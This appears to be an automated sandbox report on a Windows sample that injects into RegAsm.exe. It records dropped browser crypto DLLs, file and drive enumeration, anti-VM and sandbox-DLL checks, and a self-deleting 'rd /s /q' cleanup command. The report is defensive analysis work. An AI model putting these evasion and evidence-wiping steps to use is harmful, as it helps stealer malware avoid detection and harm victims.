Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0041608F GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0041608F

Source: file.exe	Static PE information: section name: .Shine
Source: sqlx[1].dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A420B5 push ecx; ret	0_2_00A420C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A06A80 push ecx; ret	0_2_00A06A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417CB5 push ecx; ret	1_2_00417CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19821BF9 push ecx; ret	1_2_199C4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198210C8 push ecx; ret	1_2_19A23552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_0041608F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

graph_1-79008

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.2 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 9076

Thread sleep count: 81 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040E76B GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040E87Eh

1_2_0040E76B

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A17331 FindFirstFileExW,	0_2_00A17331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004011D9 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_004011D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004145BC _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_004145BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00414CC7 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00414CC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040BDAF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040BDAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00409E01 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00409E01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00413F80 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00413F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004093C1 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004093C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004097DC _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004097DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00414960 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00414960

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0041433D _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_0041433D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040E907 GetSystemInfo,wsprintfA,

1_2_0040E907

